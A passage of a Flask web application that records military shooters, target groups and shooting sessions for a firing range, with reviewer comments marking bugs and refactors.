                Shooter.id == getattr(detail, 'target_%d_id' % n)).scalar()
            getattr(form, 'target_%d_service' % n).data = shooter.service_id
    except Exception as e:
        return render_template('errors/detail_view.html')
    return render_template('pages/detail_view_edit.html', detail=detail, form=form)
@app.route('/data_save', methods=['GET', 'POST'])
def data_save():
    """Static page shown when the live detail is already flagged as saved."""
    template_name = 'pages/data_save.html'
    return render_template(template_name)
@app.route('/target_registration/', methods=['GET', 'POST'])
def target_registration():
    """JSON endpoint: register a single shooter from an AJAX payload.

    Expects a JSON object with keys cant, div, rank, gender, date, name,
    service, unit and brig; resolves the display names to foreign-key ids
    and inserts a Shooter row.  Returns {"result": <message>} - null on a
    plain GET.
    """
    result = None
    if request.method == "POST":
        payload = request.get_json()
        # Resolve display names to foreign-key ids.
        gender_id = db.session.query(Gender.id).filter(
            Gender.name == payload['gender']).scalar()
        rank_id = db.session.query(Rank.id).filter(
            Rank.name == payload['rank']).scalar()
        cant_id = db.session.query(Cantonment.id).filter(
            Cantonment.cantonment == payload['cant'],
            Cantonment.division == payload['div']).scalar()
        shooter = Shooter(
            name=payload['name'],
            service_id=payload['service'],
            registration_date=payload['date'],
            gender_id=gender_id,
            cantonment_id=cant_id,
            rank_id=rank_id,
            unit=payload['unit'],
            brigade=payload['brig']
        )
        db.session.add(shooter)
        db.session.commit()
        result = "Data Saved Successfully"  # fixed typo (was "Sucessfully")
    return jsonify(result=result)
@app.route('/shooter_registration/', methods=['GET', 'POST'])
def registration():
    """Register a single shooter via the HTML form.

    Dropdown selections (rank, cantonment, gender, brigade/division) are
    read straight from request.form; the remaining fields come through
    RegistrationForm.  Redirects to 'firer_details' on success and to
    'error_4' on any failure.
    """
    try:
        # Reference data for the template's dropdowns.
        cantonment=Cantonment.query.distinct(Cantonment.cantonment)
        gender =Gender.query.all()
        rank = Rank.query.all()
        ran = request.form.get('comp_select4')
        cant = request.form.get('comp_select')
        gen = request.form.get('comp_select5')
        brig = request.form.get('comp_select1')
        form = RegistrationForm(request.form)
        if(ran is None):
            # Plain GET render: no dropdown values were posted.
            pass
        else:
            # Resolve the selected display names to foreign-key ids.
            # NOTE(review): if a lookup misses, .id on None raises and the
            # except below redirects to 'error_4'.
            ran_object=Rank.query.filter(Rank.name==ran).scalar()
            rank_id = ran_object.id
            cant_object = Cantonment.query.filter(Cantonment.cantonment==cant,Cantonment.division==brig).scalar()
            cant_id = cant_object.id
            gen_obj=Gender.query.filter(Gender.name==gen).scalar()
            gender_id = gen_obj.id
        if form.validate_on_submit():
            # NOTE(review): rank_id/cant_id/gender_id are unbound when the
            # dropdowns were not posted (ran is None); the resulting
            # NameError is swallowed by the except -> 'error_4'.
            shooter = Shooter(
                name=form.name.data,
                service_id = form.service_id.data,
                registration_date = form.dt.data.strftime('%Y-%m-%d'),
                gender_id=gender_id,
                cantonment_id = cant_id,
                rank_id =rank_id,
                unit=form.unit.data,
                brigade=form.brig.data
            )
            db.session.add(shooter)
            db.session.commit()
            new_form = RegistrationForm(request.form)
            return redirect(url_for('firer_details'))
    except Exception as e:
        return redirect(url_for('error_4'))
    return render_template('forms/registration.html',
        cantonment = cantonment ,
        form=form ,
        rank = rank,
        gender=gender)
@app.route('/get_brigade/')
def get_brigade():
    """AJAX endpoint: list the distinct divisions of the given cantonment.

    Reads the cantonment name from the 'customer' query parameter and
    returns a JSON array of {"name": <division>} objects.
    """
    cant = request.args.get('customer')
    # (The original had a redundant chained assignment: `da = da = ...`.)
    rows = Cantonment.query.filter(
        Cantonment.cantonment == cant).distinct(Cantonment.division)
    data = [{"name": row.division} for row in rows]
    return jsonify(data)
@app.route('/firer_details/', methods=['GET', 'POST'])
def firer_details():
    """List all registered shooters with cantonment, rank and gender resolved."""
    shooters = Shooter.query.all()
    for person in shooters:
        # cantonment_name and division both carry the Cantonment row;
        # the template picks the attribute it needs from each.
        cantonment_row = Cantonment.query.filter(
            Cantonment.id == person.cantonment_id).scalar()
        person.cantonment_name = cantonment_row
        person.division = cantonment_row
        person.rank = Rank.query.filter(Rank.id == person.rank_id).scalar()
        person.gender_name = Gender.query.filter(
            Gender.id == person.gender_id).scalar()
    return render_template('pages/firer_details.html', firer=shooters)
@app.route('/bulk_registration_group')
def bulk_registration_group():
    """Render the bulk group-upload page with an empty form."""
    upload_form = BulkRegistrationForm(request.form)
    return render_template('pages/bulk_registration_group.html', form=upload_form)
@app.route('/bulk_registration')
def bulk_registration():
    """Render the bulk shooter-upload page with the cantonment dropdown."""
    upload_form = RegistrationForm(request.form)
    cantonments = db.session.query(Cantonment).distinct(Cantonment.cantonment)
    return render_template('pages/bulk_registration.html',
                           cantonment=cantonments, form=upload_form)
@app.route('/upload', methods=['POST'])
def upload():
    """Bulk-register shooters from an uploaded CSV file.

    Expected CSV columns: name, rank name, gender name, service id; the
    first row is a header and is skipped.  The cantonment comes from the
    two select fields; unit and brigade from the free-text fields.
    Redirects to 'firer_details' on success, 'error_3' on failure.
    """
    try:
        f = request.files['data_file']
        cant = request.form.get('comp_select')
        div = request.form.get('comp_select1')
        form = RegistrationForm(request.form)
        unit = request.form['game_id_1']
        brig = request.form['game_id_2']
        cant_id = db.session.query(Cantonment.id).filter(
            Cantonment.cantonment == cant,
            Cantonment.division == div
        ).scalar()
        if form.is_submitted():
            stream = StringIO(f.stream.read().decode("UTF8"))
            rows = list(csv.reader(stream))
            for row in rows[1:]:  # skip the header row
                shooter = Shooter(
                    name=row[0],
                    service_id=row[3],
                    registration_date=datetime.now(),
                    gender_id=db.session.query(Gender.id).filter(
                        Gender.name == row[2]).scalar(),
                    cantonment_id=cant_id,
                    rank_id=db.session.query(Rank.id).filter(
                        Rank.name == row[1]).scalar(),
                    unit=unit,
                    brigade=brig
                )
                db.session.add(shooter)
                db.session.commit()
    except Exception as e:
        return redirect(url_for('error_3'))
    return redirect(url_for('firer_details'))
@app.route('/uploadgroup', methods=['POST'])
def uploadgroup():
    """Bulk-load target groups from an uploaded CSV file.

    CSV columns: group number followed by the eight target service numbers;
    the first row is a header and is skipped.  Any TGroup rows dated on or
    before yesterday are purged before the import.  Redirects to
    'group_view' on success, 'error_duplicate' on failure.
    """
    def _import_groups(csv_file):
        # Parse the CSV (header skipped) and insert one TGroup per row.
        stream = StringIO(csv_file.stream.read().decode("UTF8"))
        rows = list(csv.reader(stream))
        for row in rows[1:]:
            group = TGroup(
                date=datetime.now(),
                group_no=row[0],
                target_1_no=row[1],
                target_2_no=row[2],
                target_3_no=row[3],
                target_4_no=row[4],
                target_5_no=row[5],
                target_6_no=row[6],
                target_7_no=row[7],
                target_8_no=row[8]
            )
            db.session.add(group)
            db.session.commit()

    try:
        f = request.files['data_file']
        form = BulkRegistrationForm(request.form)
        if form.is_submitted():
            curdate_p = (date.today()) - timedelta(1)
            # Purge stale groups (dated on/before yesterday), then import.
            # The original duplicated the whole import loop in both branches.
            if db.session.query(db.exists().where(TGroup.date <= curdate_p)).scalar():
                db.session.query(TGroup).delete()
                db.session.commit()
            _import_groups(f)
    except Exception as e:
        return redirect(url_for('error_duplicate'))
    return redirect(url_for('group_view'))
@app.route('/new_group')
def new_group():
    """Render the new-group form with every known service id (autocomplete)."""
    service_ids = [shooter.service_id for shooter in Shooter.query.all()]
    return render_template('pages/new_group.html', firer_1=service_ids)
@app.route('/individual_group/', methods=['GET', 'POST'])
def individual_group():
    """Create (or replace) a target group from the eight 'tag' form fields.

    Empty tags map to the sentinel id 999 for the duplicate check.  TGroup
    rows dated exactly yesterday trigger a full purge before the new group
    is stored.  Duplicate (non-empty) firers abort to an error page; any
    other failure renders the group-view error page.
    """
    try:
        curdate_p = (date.today()) - timedelta(1)
        #check=mysession.query(TGroup).filter(date==curdate_p).all()
        if request.method == "POST":
            grp = request.form['game_id_1']
            # Field names: first lane is 'tag', the rest 'tag_1'..'tag_7'.
            field_names = ['tag'] + ['tag_%d' % n for n in range(1, 8)]
            service_nos = [request.form[name] for name in field_names]
            # Resolve each service number to a Shooter id; empty -> 999.
            ids = []
            for service_no in service_nos:
                if service_no == "":
                    ids.append(999)
                else:
                    shooter = Shooter.query.filter(
                        Shooter.service_id == service_no).scalar()
                    ids.append(shooter.id)
            # A group is invalid when two occupied lanes share a firer;
            # the 999 sentinel may repeat freely.  (The original nested
            # loop could reset the flag back to False when a 999/999 pair
            # was visited after a real duplicate.)
            duplicate = any(
                ids[i] == ids[j] and ids[i] != 999
                for i in range(len(ids))
                for j in range(len(ids))
                if i != j
            )
            # Purge yesterday's groups before storing today's (as in the
            # original, this happens even when the new group is rejected).
            if db.session.query(db.exists().where(TGroup.date == curdate_p)).scalar():
                db.session.query(TGroup).delete()
                db.session.commit()
            if duplicate:
                return redirect(url_for('duplicate_firer_error'))
            gr = TGroup(
                date=datetime.now(),
                group_no=grp,
                target_1_no=service_nos[0],
                target_2_no=service_nos[1],
                target_3_no=service_nos[2],
                target_4_no=service_nos[3],
                target_5_no=service_nos[4],
                target_6_no=service_nos[5],
                target_7_no=service_nos[6],
                target_8_no=service_nos[7]
            )
            db.session.add(gr)
            db.session.commit()
    except Exception as e:
        return render_template('errors/group_view_error.html')
    return redirect(url_for('group_view'))
@app.route('/group_view/', methods=['GET', 'POST'])
def group_view():
    """List every current target group."""
    groups = TGroup.query.all()
    return render_template('pages/group_detail_view.html', detail=groups)
@app.route('/group_view/detail/<id>', methods=['GET', 'POST'])
def group_detail_view(id):
    """Show the rows of one group, selected by its group number."""
    rows = TGroup.query.filter(TGroup.group_no == id)
    return render_template('pages/group_detail_view_id.html', data=rows)
@app.route('/group_details/edit/<id>', methods=['GET', 'POST'])
def group_detail_edit(id):
    """Edit one target group: valid POST saves, otherwise pre-populate."""
    firer = TGroup.query.filter(TGroup.group_no == id).first()
    form = GroupEditForm(obj=firer)
    if form.validate_on_submit():
        # Copy form fields target_N_army back onto the row's target_N_no.
        firer.date = form.date.data
        for lane in range(1, 9):
            setattr(firer, 'target_%d_no' % lane,
                    getattr(form, 'target_%d_army' % lane).data)
        firer.group_no = form.group_no.data
        db.session.commit()
        return redirect(url_for('group_view'))
    # GET (or invalid POST): mirror the stored row into the form.
    form.group_no.data = firer.group_no
    for lane in range(1, 9):
        getattr(form, 'target_%d_army' % lane).data = getattr(
            firer, 'target_%d_no' % lane)
    return render_template('pages/group_edit.html', firer=firer, form=form)
@app.route('/firer_details/detail/<id>', methods=['GET', 'POST'])
def firer_detail_view(id):
    """Show one shooter (by service id) with related rows resolved."""
    shooters = Shooter.query.filter(Shooter.service_id == id)
    for person in shooters:
        # cantonment_name and division both carry the Cantonment row;
        # the template picks the attribute it needs from each.
        cantonment_row = Cantonment.query.filter(
            Cantonment.id == person.cantonment_id).scalar()
        person.cantonment_name = cantonment_row
        person.division = cantonment_row
        person.rank = Rank.query.filter(Rank.id == person.rank_id).scalar()
        person.gender_name = Gender.query.filter(
            Gender.id == person.gender_id).scalar()
    return render_template('pages/firer_detail_view.html', data=shooters)
@app.route('/firer_details/edit/<id>', methods=['GET', 'POST'])
def firer_detail_edit(id):
    """Edit a registered shooter selected by service id.

    On a valid POST the row is updated (display names resolved back to
    foreign-key ids) and the user is redirected to 'firer_details'.  On GET
    the form is pre-populated from the stored row.  Any failure redirects
    to 'error_7'.
    """
    firer = Shooter.query.filter(Shooter.service_id == id).first()
    form = RegistrationEditForm(obj=firer)
    try:
        if form.validate_on_submit():
            firer.name = form.name.data
            firer.service_id = form.service_id.data
            firer.registration_date = form.date.data
            gender_obj = Gender.query.filter(
                Gender.name == form.gender.data).scalar()
            firer.gender_id = gender_obj.id
            cantonment_obj = Cantonment.query.filter(
                Cantonment.cantonment == form.cantonment.data,
                Cantonment.division == form.div.data).scalar()
            firer.cantonment_id = cantonment_obj.id
            # Bug fix: the original queried the Range model while filtering
            # on Rank.name, so the id written to firer.rank_id came from the
            # wrong table.  Query Rank itself.
            rank_obj = Rank.query.filter(
                Rank.name == form.rank.data).distinct(Rank.id).scalar()
            firer.rank_id = rank_obj.id
            firer.unit = form.unit.data
            firer.brigade = form.brigade.data
            db.session.commit()
            return redirect(url_for('firer_details'))
        # GET (or invalid POST): pre-populate the form from the stored row.
        form.name.data = firer.name
        form.service_id.data = firer.service_id
        form.date.data = firer.registration_date
        gender_name = Gender.query.filter(Gender.id == firer.gender_id).scalar()
        form.gender.data = gender_name.name
        cantonment_name = Cantonment.query.filter(
            Cantonment.id == firer.cantonment_id).scalar()
        form.cantonment.data = cantonment_name.cantonment
        form.div.data = cantonment_name.division
        unit_data = Shooter.query.filter(
            Shooter.service_id == firer.service_id).scalar()
        form.unit.data = unit_data.unit
        form.brigade.data = unit_data.brigade
        rank_name = Rank.query.filter(
            Rank.id == firer.rank_id).distinct(Rank.name).scalar()
        form.rank.data = rank_name.name
    except Exception as e:
        return redirect(url_for('error_7'))
    return render_template('pages/firer_detail_edit.html', firer=firer, form=form)
@app.route('/live/')
def live():
    """Render the live view: name, service number and rank for each of the
    eight targets currently loaded in the TShooting table.

    The original spelled out 32 near-identical queries and a 24-keyword
    render call; this builds the same T{n}_name / T{n}_service / T{n}_rank
    context in a loop over the lane numbers.
    """
    context = {}
    for n in range(1, 9):
        # Column object TShooting.target_n_id correlates the Shooter lookup
        # with the live table, exactly as the original per-lane queries did.
        target_col = getattr(TShooting, 'target_%d_id' % n)
        context['T%d_name' % n] = mysession.query(Shooter.name).filter(
            Shooter.id == target_col).scalar()
        context['T%d_service' % n] = mysession.query(Shooter.service_id).filter(
            Shooter.id == target_col).scalar()
        rank_id = mysession.query(Shooter.rank_id).filter(
            Shooter.id == target_col).scalar()
        context['T%d_rank' % n] = mysession.query(Rank.name).filter(
            Rank.id == rank_id).scalar()
    return render_template('pages/live.html', **context)
# Camera-detail pages.  NOTE(review): for every endpoint below the route
# number and the rendered template number disagree (e.g. /cam_detail_2/
# renders cam_detail_1.html, /cam_detail_1/ renders cam_detail_3.html).
# This may be a deliberate camera-to-lane mapping, but it should be
# confirmed against the physical camera layout before relying on it.
@app.route('/cam_detail_2/', methods=['GET', 'POST'])
def cam_detail_2():
    return render_template('pages/cam_detail_1.html')
@app.route('/cam_detail_4/', methods=['GET', 'POST'])
def cam_detail_4():
    return render_template('pages/cam_detail_2.html')
@app.route('/cam_detail_1/', methods=['GET', 'POST'])
def cam_detail_1():
    return render_template('pages/cam_detail_3.html')
@app.route('/cam_detail_3/', methods=['GET', 'POST'])
def cam_detail_3():
    return render_template('pages/cam_detail_4.html')
@app.route('/cam_detail_6/', methods=['GET', 'POST'])
def cam_detail_6():
    return render_template('pages/cam_detail_5.html')
@app.route('/cam_detail_8/', methods=['GET', 'POST'])
def cam_detail_8():
    return render_template('pages/cam_detail_6.html')
@app.route('/cam_detail_7/', methods=['GET', 'POST'])
def cam_detail_7():
    return render_template('pages/cam_detail_7.html')
@app.route('/cam_detail_5/', methods=['GET', 'POST'])
def cam_detail_5():
    return render_template('pages/cam_detail_8.html')
@app.route('/session_setup/', methods=['GET', 'POST'])
def session_setup():
    """Create a new Shooting_Session from the session-setup form.

    GET renders the form with dropdown data (shooters, ranges, firearms,
    ammunition).  POST resolves the selected range / firearm / ammunition
    names to ids, inserts the session row and redirects to the
    configuration list.
    """
    try:
        data = Shooter.query.all()
        rang= Range.query.all()
        firearms = Firearms.query.all()
        ammunation = Ammunation.query.all()
        # Dropdown selections arrive as display names (may be None on GET).
        rang_name = request.form.get('comp_select_4')
        fire_name = request.form.get('comp_select_5')
        ammu_name = request.form.get('comp_select_6')
        form=SessionForm()
        if(rang_name is None):
            # Nothing selected yet: 999 is the project's placeholder id.
            range_id=999
            fire_id=999
            ammu_id=999
        else:
            range_id = db.session.query(Range.id).filter(Range.name==rang_name).scalar()
            fire_id = db.session.query(Firearms.id).filter(Firearms.name==fire_name).scalar()
            ammu_id = db.session.query(Ammunation.id).filter(Ammunation.name==ammu_name).scalar()
        if form.validate_on_submit():
            shooting=Shooting_Session(
                date=form.date.data.strftime('%Y-%m-%d'),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                shooting_range_id=range_id,
                firearms_id=fire_id,
                ammunation_id=ammu_id,
                target_distance = form.target_distance.data,
                weather_notes = form.weather_notes.data,
                comments = form.comments.data,
                session_no=form.session_no.data,
                occasion=form.occ.data
            )
            db.session.add(shooting)
            db.session.commit()
            return redirect(url_for('session_config'))
    except Exception as e:
        # NOTE(review): url_for() takes an *endpoint name*, not a template
        # filename; 'error5_505.html' is not an endpoint, so this line itself
        # raises BuildError and the client gets a plain 500 instead of the
        # intended error page.  Probably meant render_template on an error
        # template.  The broad `except Exception` also hides the root cause.
        return redirect(url_for('error5_505.html'))
    # Reached on GET or when validation fails.  NOTE: `firearmns` (sic) is
    # the keyword the template expects; renaming it would break the page.
    return render_template('forms/shooting_form.html', form=form, data =data ,rang=rang , firearmns=firearms, ammunation = ammunation)
@app.route('/configuration/', methods=['GET', 'POST'])
def session_config():
    """List every shooting session, with the range / firearm / ammunition
    ids resolved to display names (attached as extra attributes that the
    template reads)."""
    sessions = Shooting_Session.query.all()
    for record in sessions:
        # attribute names (incl. the `firerarms_name` typo) are what the
        # template expects -- keep them as-is
        record.range_name = Range.query.filter(Range.id == record.shooting_range_id).scalar()
        record.firerarms_name = Firearms.query.filter(Firearms.id == record.firearms_id).scalar()
        record.ammunation_name = Ammunation.query.filter(Ammunation.id == record.ammunation_id).scalar()
    return render_template('pages/shooting_configuration_detail.html', con=sessions)
@app.route('/image_process/')
def image_process():
    """Image-processing page: shows today's unsaved details plus the
    name / service id / rank of the firer on each of the 8 targets.

    Side effect: if the live TShooting row is already saved
    (save_flag == 1) it is deleted here and placeholders are shown.
    """
    dt=time.strftime("%Y-%m-%d")
    # today's detail rows that have not been saved yet
    detail_data=db.session.query(Session_Detail).filter(Session_Detail.date==dt,Session_Detail.save_flag==0).all()
    data =TShooting.query.scalar()
    if(data is None):
        # No live detail at all: placeholders for every target.
        T1_name ="NA"
        T1_service ="NA"
        T1_rank="NA"
        T2_name ="NA"
        T2_service ="NA"
        T2_rank="NA"
        T3_name ="NA"
        T3_service ="NA"
        T3_rank="NA"
        T4_name ="NA"
        T4_service ="NA"
        T4_rank="NA"
        T5_name ="NA"
        T5_service ="NA"
        T5_rank="NA"
        T6_name ="NA"
        T6_service ="NA"
        T6_rank="NA"
        T7_name ="NA"
        T7_service ="NA"
        T7_rank="NA"
        T8_name ="NA"
        T8_service ="NA"
        T8_rank="NA"
    elif(data.save_flag == 1 ):
        # Detail already saved: clear the live table and show placeholders.
        db.session.query(TShooting).delete()
        db.session.commit()
        T1_name ="NA"
        T1_service ="NA"
        T1_rank="NA"
        T2_name ="NA"
        T2_service ="NA"
        T2_rank="NA"
        T3_name ="NA"
        T3_service ="NA"
        T3_rank="NA"
        T4_name ="NA"
        T4_service ="NA"
        T4_rank="NA"
        T5_name ="NA"
        T5_service ="NA"
        T5_rank="NA"
        T6_name ="NA"
        T6_service ="NA"
        T6_rank="NA"
        T7_name ="NA"
        T7_service ="NA"
        T7_rank="NA"
        T8_name ="NA"
        T8_service ="NA"
        T8_rank="NA"
    else:
        # Live detail present: look up each target's shooter; "NA" when the
        # lane is empty.  NOTE(review): only T3 and T4 add the explicit
        # `!= 999` placeholder filter -- the other six rely on no Shooter row
        # having id 999.  Inconsistent; confirm whether 999 exists in Shooter.
        T1=Shooter.query.filter(Shooter.id==TShooting.target_1_id).scalar()
        if(T1 is None):
            T1_name ="NA"
            T1_service ="NA"
            T1_rank="NA"
        else:
            T1_name = T1.name
            T1_service = T1.service_id
            T1_r_id = T1.rank_id
            T1_rank_id = Rank.query.filter(Rank.id==T1_r_id).scalar()
            T1_rank=T1_rank_id.name
        T2=Shooter.query.filter(Shooter.id==TShooting.target_2_id).scalar()
        if(T2 is None):
            T2_name ="NA"
            T2_service ="NA"
            T2_rank="NA"
        else:
            T2_name = T2.name
            T2_service = T2.service_id
            T2_r_id = T2.rank_id
            T2_rank_id = Rank.query.filter(Rank.id==T2_r_id).scalar()
            T2_rank=T2_rank_id.name
        T3=Shooter.query.filter(Shooter.id==TShooting.target_3_id,TShooting.target_3_id!=999).scalar()
        if(T3 is None):
            T3_name ="NA"
            T3_service ="NA"
            T3_rank="NA"
        else:
            T3_name = T3.name
            T3_service = T3.service_id
            T3_r_id = T3.rank_id
            T3_rank_id = Rank.query.filter(Rank.id==T3_r_id).scalar()
            T3_rank=T3_rank_id.name
        T4=Shooter.query.filter(Shooter.id==TShooting.target_4_id,TShooting.target_4_id!=999).scalar()
        if(T4 is None):
            T4_name ="NA"
            T4_service ="NA"
            T4_rank="NA"
        else:
            T4_name = T4.name
            T4_service = T4.service_id
            T4_r_id = T4.rank_id
            T4_rank_id = Rank.query.filter(Rank.id==T4_r_id).scalar()
            T4_rank=T4_rank_id.name
        T5=Shooter.query.filter(Shooter.id==TShooting.target_5_id).scalar()
        if(T5 is None):
            T5_name ="NA"
            T5_service ="NA"
            T5_rank="NA"
        else:
            T5_name = T5.name
            T5_service = T5.service_id
            T5_r_id = T5.rank_id
            T5_rank_id = Rank.query.filter(Rank.id==T5_r_id).scalar()
            T5_rank=T5_rank_id.name
        T6=Shooter.query.filter(Shooter.id==TShooting.target_6_id).scalar()
        if(T6 is None):
            T6_name ="NA"
            T6_service ="NA"
            T6_rank="NA"
        else:
            T6_name = T6.name
            T6_service = T6.service_id
            T6_r_id = T6.rank_id
            T6_rank_id = Rank.query.filter(Rank.id==T6_r_id).scalar()
            T6_rank=T6_rank_id.name
        T7=Shooter.query.filter(Shooter.id==TShooting.target_7_id).scalar()
        if(T7 is None):
            T7_name ="NA"
            T7_service ="NA"
            T7_rank="NA"
        else:
            T7_name = T7.name
            T7_service = T7.service_id
            T7_r_id = T7.rank_id
            T7_rank_id = Rank.query.filter(Rank.id==T7_r_id).scalar()
            T7_rank=T7_rank_id.name
        T8=Shooter.query.filter(Shooter.id==TShooting.target_8_id).scalar()
        if(T8 is None):
            T8_name ="NA"
            T8_service ="NA"
            T8_rank="NA"
        else:
            T8_name = T8.name
            T8_service = T8.service_id
            T8_r_id = T8.rank_id
            T8_rank_id = Rank.query.filter(Rank.id==T8_r_id).scalar()
            T8_rank=T8_rank_id.name
    return render_template('pages/image_process.html' ,
        T1_name=T1_name,
        detail_data=detail_data,
        T1_service=T1_service,
        T2_name=T2_name,
        T2_service=T2_service,
        T3_name=T3_name,
        T3_service=T3_service,
        T4_name=T4_name,
        T4_service=T4_service,
        T5_name=T5_name,
        T5_service=T5_service,
        T6_name=T6_name,
        T6_service=T6_service,
        T7_name=T7_name,
        T7_service=T7_service,
        T8_name=T8_name,
        T8_service=T8_service,
        T1_rank=T1_rank,
        T2_rank=T2_rank,
        T3_rank=T3_rank,
        T4_rank=T4_rank,
        T5_rank=T5_rank,
        T6_rank=T6_rank,
        T7_rank=T7_rank,
        T8_rank=T8_rank
        )
# Static image-editing pages for targets 1-8 (here route number and template
# number match one-to-one).
@app.route('/image_edit_1/', methods=['GET', 'POST'])
def image_edit_1():
    return render_template('pages/image_edit_1.html')
@app.route('/image_edit_2/', methods=['GET', 'POST'])
def image_edit_2():
    return render_template('pages/image_edit_2.html')
@app.route('/image_edit_3/', methods=['GET', 'POST'])
def image_edit_3():
    return render_template('pages/image_edit_3.html')
@app.route('/image_edit_4/', methods=['GET', 'POST'])
def image_edit_4():
    return render_template('pages/image_edit_4.html')
@app.route('/image_edit_5/', methods=['GET', 'POST'])
def image_edit_5():
    return render_template('pages/image_edit_5.html')
@app.route('/image_edit_6/', methods=['GET', 'POST'])
def image_edit_6():
    return render_template('pages/image_edit_6.html')
@app.route('/image_edit_7/', methods=['GET', 'POST'])
def image_edit_7():
    return render_template('pages/image_edit_7.html')
@app.route('/image_edit_8/', methods=['GET', 'POST'])
def image_edit_8():
    return render_template('pages/image_edit_8.html')
@app.route('/configuration/detail/<id>', methods=['GET', 'POST'])
def session_config_detail(id):
    """Show a single shooting-session configuration, with the range /
    firearm / ammunition ids resolved to display names for the template."""
    sessions = Shooting_Session.query.filter(Shooting_Session.id == id)
    for record in sessions:
        # `firerarms_name` spelling is what the template reads -- keep it
        record.range_name = Range.query.filter(Range.id == record.shooting_range_id).scalar()
        record.firerarms_name = Firearms.query.filter(Firearms.id == record.firearms_id).scalar()
        record.ammunation_name = Ammunation.query.filter(Ammunation.id == record.ammunation_id).scalar()
    return render_template('pages/shooting_configuration_detail_view.html', con=sessions)
@app.route('/configuration/edit/<id>', methods=['GET', 'POST'])
def shooting_config_edit(id):
    """Edit an existing Shooting_Session.

    On a valid POST: copy the form fields onto the record (resolving range /
    firearm / ammunition display names back to ids), commit and redirect to
    the configuration list.  Otherwise fall through to pre-fill the form
    from the record and render the edit page.
    """
    edit = Shooting_Session.query.get_or_404(id)
    # obj= pre-fills only fields whose names match the model; the
    # differently-named ones (occ, *_name) are filled manually below.
    form = SessionEditForm(obj=edit)
    if form.validate_on_submit():
        edit.session_no = form.session_no.data
        edit.date = form.date.data
        edit.occasion=form.occ.data
        edit.target_distance = form.target_distance.data
        # NOTE(review): if the submitted name matches no row, scalar()
        # returns None and the `.id` below raises AttributeError -> 500.
        ammunation_id=Ammunation.query.filter(Ammunation.name==form.ammunation_name.data).scalar()
        edit.ammunation_id=ammunation_id.id
        firearms_id=Firearms.query.filter(Firearms.name==form.firerarms_name.data).scalar()
        edit.firearms_id=firearms_id.id
        range_id=Range.query.filter(Range.name==form.range_name.data).scalar()
        edit.shooting_range_id=range_id.id
        edit.weather_notes=form.weather_notes.data
        edit.comments=form.comments.data
        db.session.commit()
        return redirect(url_for('session_config'))
    # GET (or failed validation): pre-fill the form from the record,
    # translating ids to display names for the three lookup fields.
    form.session_no.data=edit.session_no
    form.date.data=edit.date
    form.occ.data=edit.occasion
    ammunation_name=Ammunation.query.filter(Ammunation.id==edit.ammunation_id).scalar()
    form.ammunation_name.data=ammunation_name.name
    firerarms_name=Firearms.query.filter(Firearms.id==edit.firearms_id).scalar()
    form.firerarms_name.data=firerarms_name.name
    range_name=Range.query.filter(Range.id==edit.shooting_range_id).scalar()
    form.range_name.data=range_name.name
    form.weather_notes.data=edit.weather_notes
    form.comments.data=edit.comments
    return render_template('pages/shooting_configuration_edit.html',form=form,edit=edit)
def _dashboard_shooter_info(target_id_column):
    """Resolve (name, service_id, rank name) for the shooter whose id matches
    the given TShooting target column.

    Returns ("NA", "NA", "NA") when no matching shooter exists.  The original
    inline code had no None-guard and crashed with AttributeError on an empty
    lane; "NA" matches what the sibling image_process view displays.
    """
    shooter = Shooter.query.filter(Shooter.id == target_id_column).scalar()
    if shooter is None:
        return "NA", "NA", "NA"
    rank = Rank.query.filter(Rank.id == shooter.rank_id).scalar()
    return shooter.name, shooter.service_id, rank.name
@app.route('/detail_dashboard/')
def detail_dashboard():
    """Dashboard showing name / service id / rank for the firers currently
    assigned to targets 1-8 in the live TShooting row; all "NA" when no live
    detail exists."""
    tshoot = db.session.query(TShooting).scalar()
    if tshoot is None:
        info = [("NA", "NA", "NA")] * 8
    else:
        columns = (TShooting.target_1_id, TShooting.target_2_id,
                   TShooting.target_3_id, TShooting.target_4_id,
                   TShooting.target_5_id, TShooting.target_6_id,
                   TShooting.target_7_id, TShooting.target_8_id)
        info = [_dashboard_shooter_info(col) for col in columns]
    names, services, ranks = zip(*info)
    return render_template('pages/detail_dashboard.html',
                           T1_name=names[0],
                           T1_service=services[0],
                           T2_name=names[1],
                           T2_service=services[1],
                           T3_name=names[2],
                           T3_service=services[2],
                           T4_name=names[3],
                           T4_service=services[3],
                           T5_name=names[4],
                           T5_service=services[4],
                           T6_name=names[5],
                           T6_service=services[5],
                           T7_name=names[6],
                           T7_service=services[6],
                           T8_name=names[7],
                           T8_service=services[7],
                           T1_rank=ranks[0],
                           T2_rank=ranks[1],
                           T3_rank=ranks[2],
                           T4_rank=ranks[3],
                           T5_rank=ranks[4],
                           T6_rank=ranks[5],
                           T7_rank=ranks[6],
                           T8_rank=ranks[7]
                           )
@app.route('/adhoc_detail_1/', methods=['GET', 'POST'])
def adhoc_detail_1():
    """Ad-hoc lookup endpoint: given a service number (JSON key "usr"),
    return the firer's name / rank / cantonment, their last five grouping
    results, tendencies and grouping lengths, and the firers recorded for
    today's sets 1-4.  A plain GET returns all-None JSON.
    """
    name_1=None
    army=None
    rank=None
    cant=None
    set_1_name=None
    set_1_army=None
    set_2_name=None
    set_2_army=None
    set_3_name=None
    set_3_army=None
    set_4_name=None
    set_4_army=None
    res=[]
    ten=[]
    gp_len=[]
    if request.method == "POST":
        data1 = request.get_json()
        # "usr" carries the service (army) number, not a user name
        army=data1['usr']
        curdate=time.strftime("%Y-%m-%d")
        name_1=db.session.query(Shooter.name).filter(Shooter.service_id==army).scalar()
        target_1_id=db.session.query(Shooter.id).filter(Shooter.service_id==army).scalar()
        rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==army).scalar()
        cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==army).scalar()
        rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
        cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
        # last five history rows, oldest first ([::-1] reverses the desc order)
        tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
        tres = db.session.query(Grouping.result).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
        tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
        # flatten the single-column row tuples into plain lists
        for ele in tres:
            for ele2 in ele:
                res.append(ele2)
        for ele3 in tten:
            for ele4 in ele3:
                ten.append(ele4)
        for ele5 in tgp:
            for ele6 in ele5:
